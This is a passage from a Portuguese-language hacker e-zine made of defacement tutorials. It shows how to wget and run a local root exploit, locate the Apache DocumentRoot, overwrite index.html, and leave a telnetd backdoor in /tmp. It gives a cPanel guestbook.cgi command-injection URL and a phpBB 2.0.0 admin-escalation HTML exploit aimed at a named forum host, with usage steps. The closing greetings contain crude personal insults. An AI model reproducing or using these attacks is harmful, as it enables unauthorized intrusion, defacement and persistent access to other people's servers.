certo, se um dos dois protocolos tiver você pode baixar um exploit
para fuder com essa máquina e adquirir root local.
wget http://www.site.com.br/exploitlocal
chmod 750 exploitlocal
./local
uid=(0)root gid=(0)root
[*] Alterando [*]
Agora o que todos mais gostam de fazer, ownar, hackear, fuder, tudo isso
é sinonimo do que você irá aprender, como você está com root você tem que encontrar
o arquivo do Apache que guarda todas as informações do servidor, como se fosse
seu dna.
digite: find / -name httpd.conf
ex: /etc/httpd/conf/httpd.conf
cd /
cd etc
cd httpd
cd connf
cat httpd.conf
pronto, você abriu o arquivo, agora você tem que localizar a seguinte linha:
<VirtualHost _default_:443>
# General setup for the virtual host
DocumentRoot /home/httpd/html/
#ServerName new.host.name
ServerAdmin root@localhost
ErrorLog logs/error_log
TransferLog logs/access_log
mais o que nos interessa é o "DocumentRoot /home/httpd/html/"
pronto, agora você já sabe que as index estão lá...
cd /
cd home
cd httpd
cd html
ls
Dire.mpg english.html index.html index.tmp openwebmail
Foto_0213.JPG espanol.html index.html.rpmnew loguin php
cdrom.swf hello.php index.html.rpmsave manual wap
design imgs index.swf msjavx86.exe webmail
a principal no caso é index.html
... agora você diz: Como mudar essa porra ?? .. simples.. calma..
echo hahahah fudi com seu sitee >> index.html
wget http://www.meusite.hpg.com.br/minhaindex.html
lynx http://www.meusite.hpg.com.br/minhaindex.html
... uma das 3 opções ..
[*] Finalizando [*]
Bom, você já fez o seu Defacer, agora se você quiser ficar com essa shell root para você
entra na pasta /tmp
cd /tmp
procure na net um backdoor chamado "telnetd"
ai coloque ele execute.. ai terá sua shell!!
*/ ViperX Corporation
|
|.|
|.|
|\./|
|\./|
. |\./| .
\^.\ |\\.//| /.^/
\--.|\ |\\.//| /|.--/
\--.| \ |\\.//| / |.--/
\---.|\ |\./| /|.---/
\--.|\ |\./| /|.--/
\ .\ |.| /. /
_ -_^_^_^_- \ \\ // / -_^_^_^_-_
- -/_/_/- ^ ^| ^ ^ -\_\_\- -
|
|
-=[ Cpanel ]=-
HEHE olha eu aqui dnovo, vamos cumexa?!?!?
Aqui vou lhe aprensentar o Cpanel, uma vull interesante, pois você vasculha um linux pelo seu navegador IE ( isso mesmo Internet Explorer )
Primeiro como se acha a vull.
Você tera a disposição o scaner do arplhmd ( sempre ele )
Achou......
Bem vamos lah....
Eu gosto de colocar uma frase em cada linha..
Ai a zine fica maior...
ultima vez.....
Pronto......
Você devera colocar assim no navegador:
www.sitebugado.com/cgi-sys/guestbook.cgi?user=cpanel&template=|os comandos linux|
EX: www.sitebugado.com/cgi-sys/guestbook.cgi?user=cpanel&template=|ls /home|
Assim ira listar todos os arquivos do diretorio Home
MAis e para wonar?????
Vamos supor que o site esteja no diretorio /home/asbl/www/
Você vai no navegador e coloca
www.sitebugado.com/cgi-sys/guestbook.cgi?user=cpanel&template=|echo Acid_c0de ensinado Cpanel #kpcrime aew > /home/asbl/www/index.htm|
Sakaram??????!!!!??Assim ira aparecer na index do site Acid_c0de ensinado Cpanel #kpcrime aew
Facinho, mais nao é facil achar sites com essa vull. Mais nao desanimem :)
|
|.|
|.|
|\./|
|\./|
. |\./| .
\^.\ |\\.//| /.^/
\--.|\ |\\.//| /|.--/
\--.| \ |\\.//| / |.--/
\---.|\ |\./| /|.---/
\--.|\ |\./| /|.--/
\ .\ |.| /. /
_ -_^_^_^_- \ \\ // / -_^_^_^_-_
- -/_/_/- ^ ^| ^ ^ -\_\_\- -
|
|
-=[ PHPBB 2.00 ]=-
hehe aqui nois dnovo!!
com mais iuma vull extinta mais vale a pena saber, quem sabe nao surgem novos sites com essa vull intao é melhor estarmos preparados.Então vamos la.....
Você podera pegar o que eu melhorei em http://www.kpcrime.kit.net/phpbb_pl.zip
Você tera que criar um html com esse codigo e seguir as instruçoes abaixo.
-------------------------------------------------------------------------------------------------
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD><TITLE>root_a_phpBB_2.0.0.pl</TITLE>
<META http-equiv=Content-Type content="text/html; charset=windows-1252"><META content="Microsoft FrontPage 5.0" name=GENERATOR></HEAD>
<BODY>
<DIV align=center>
<TABLE height=0 cellSpacing=0 cellPadding=0 align=center border=0>
<TBODY>
<TR>
<TD vAlign=top>
<SCRIPT language=Javascript1.1
src="root_a_phpBB_2_0_.0_pl_arquivos/geral@Top">
</SCRIPT>
<SCRIPT language=Javascript> <!--
_version=10; //--> </SCRIPT>
<SCRIPT language=Javascript1.1> <!--
_version=11; //--> </SCRIPT>
<SCRIPT language=Javascript>
<!--
if (navigator.appVersion.indexOf('MSIE 3') != -1) {
document.write('<IFRAME WIDTH=0 HEIGHT=0 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000" src="http://ads3.hpg.com.br/RealMedia/ads/adstream_sx.cgi/users.hpg.com.br/geral@Top"></iframe>');
} else if (_version < 11) {
document.write ('<A HREF="http://ads3.hpg.com.br/RealMedia/ads/click_nx.cgi/users.hpg.com.br/geral@Top"><img src="http://ads3.hpg.com.br/RealMedia/ads/adstream_nx.cgi/users.hpg.com.br/geral@Top"></a>');
}
// -->
</SCRIPT>
<NOSCRIPT>
<A
href="http://ads3.hpg.com.br/RealMedia/ads/click_nx.cgi/users.hpg.com.br/geral@Top"
target=_blank><IMG src="root_a_phpBB_2_0_.0_pl_arquivos/geral@Top.gif"
width=0height=0 border=0></A></NOSCRIPT></TD>
<TD vAlign=top></TD>
<TD><IFRAME id=pwads name=pwads marginWidth=0 marginHeight=0
src="root_a_phpBB_2_0_.0_pl_arquivos/pwads.gif" frameBorder=0 width=1
scrolling=no
height=1>
<SCRIPT src="http://ads.protocoloweb.com.br/pwads.php3?act=ad&tgt=js&area=15&banner=15&username=walhacker" type="text/javascript"></SCRIPT><noscript><img src="http://ads.protocoloweb.com.br/pwads.php3?act=ad&tgt=img&area=15&banner=15&username=walhacker" width=1 height=1 border=0></noscript></IFRAME><IMG
height=1 src="root_a_phpBB_2_0_.0_pl_arquivos/pixel.gif" width=1
border=0></TD></TR></TBODY></TABLE></DIV><!-- hpG publicidade: fim -->
<META content="MSHTML 6.00.2719.2200" name=GENERATOR>
<PRE>
</PRE>
<FORM action=http://bb.smvhs.kh.edu.tw/admin/admin_ug_auth.php method=post>
<P>Users: <SELECT name=userlevel> <OPTION value=admin selected>Admin</OPTION>
<OPTION value=user>User</OPTION></SELECT></P><INPUT type=hidden value=0
name=private[1]> <INPUT type=hidden value=0 name=moderator[1]> <INPUT
type=hidden value=user name=mode> <INPUT type=hidden name=adv> User ID: <INPUT
size=5 name=u> <BR><INPUT class=mainoption type=submit value=Submit name=submit>
<INPUT class=liteoption type=reset value=Reset name=reset>
</FORM>
</BODY>
</HTML>
-------------------------------------------------------------------------------------------------
Instruções de Uso
------------------
1. Vá ao site que você deseja mudar as permissões de user
para admin usando um navedor.
2. Ache o local de diretório básico do site para o Script,
i.e. se a página principal fosse http://www.server.com/phpBB2/index.php
o local de diret¢rio básico seria http://www.server.com/phpBB2
e então edite a fonte do exploit HTML deste Script de forma que a linha
escrita - form method="post" action="http://www.base_url_Aqui.com/admin/admin_ug_auth.php" -
seja o local correto á página de admin. ( mude somente o nome da pagina, ou seja,
somente substitua "www.base_url_Aqui.com" pelo link da pagina, por exemplowww.paginaphpbb2.com)
3. Va ate "Memberlist" (normalmente localizado ao topo
com o resto dos links...)
4. Procure em "Memberlist" a conta específica que você deseja
mudar as permissões para admin, e clique no nome da conta para trazer
para cima o perfil.
5. Anote direito o número ao término da URL da página que você esta
atualmente é onde diz "u =? ". (este é o valor notado, se foi apagado algum
usuário da Pilha, então o próximo ao seu número ou entao
nome de usuário da lista de membros debaixo da coluna de ``#´´ será seu
verdadeiro número de usuário, caso contrário não vai ser. - ( Então não se pode
confiar no numero de ID.)
6. Clique em "logout" no forum (se você não fazer isto
Nao ira funcionar, e lhe dará uma mensagem de permissão negada)
7. Digite o seu número de usuário na caixa de ID abaixo , e clique em submit...
Nota: Depois de clicar em submit você adquirirá uma página que lhe pede log in,
simplesmente ignore isto e então va fazer loggon no forum de
modo habitual. - Se tiver êxito, haverá um link ao fundo de toda declaração
da página no forum "Go To Administration Panel"...
e opções adicionais aparecerão na tela quando você estiver vendo uma linha
específica para permitir a editar ou apagar posts no site etc.
Falow valeu pela atenção, pois acho que você foi o unico besta que leu essas merda. E ate a proxima.....
=========================================================================================
|
|.|
|.|
|\./|
|\./|
. |\./| .
\^.\ |\\.//| /.^/
\--.|\ |\\.//| /|.--/
\--.| \ |\\.//| / |.--/
\---.|\ |\./| /|.---/
\--.|\ |\./| /|.--/
\ .\ |.| /. /
_ -_^_^_^_- \ \\ // / -_^_^_^_-_
- -/_/_/- ^ ^| ^ ^ -\_\_\- -
|
|
-=[ End ]=-
Bem aqui termino essa zine, espero que gostem pq se nao gostaram que se foda.......
Se alguem quiser postar alguma coisa aqui, um tuto que vc tenha feito e talz kernel_panic@hacker.am
= Greetz =
H4F43L - Boquinha de acerola segundo seus amigos
__k__ - Muléki chato do __k__raio
Paiste - 18 anos e a mãe dele poe ele de castigo ainda
Gary_sagara - Fundou ou uns 20 knais so para ter bastante @
Sc0n - lol
ph3r0m0n3 - "to aqui fazendo o deface das crinança"
Evolui - Pedofilo renomado
R41l4nd3r - "tenho 18 anos e ainda nao comi nenhuma mina :/ "
Code_black_ninja - 10 anos de IRC e ainda nao sabe mexer no chanserv
UNderCow - tem a doença da vaca loka
D14bl0_ - Medium espiritual
Faisca_sk8 - cowboy de rodeo ( nao estou brincando :| )
tambem agradeço aos knais #thb_clan - #System_crack - #Ir4dex - #f3pn - #NHC - #BugTravel
______EOF_________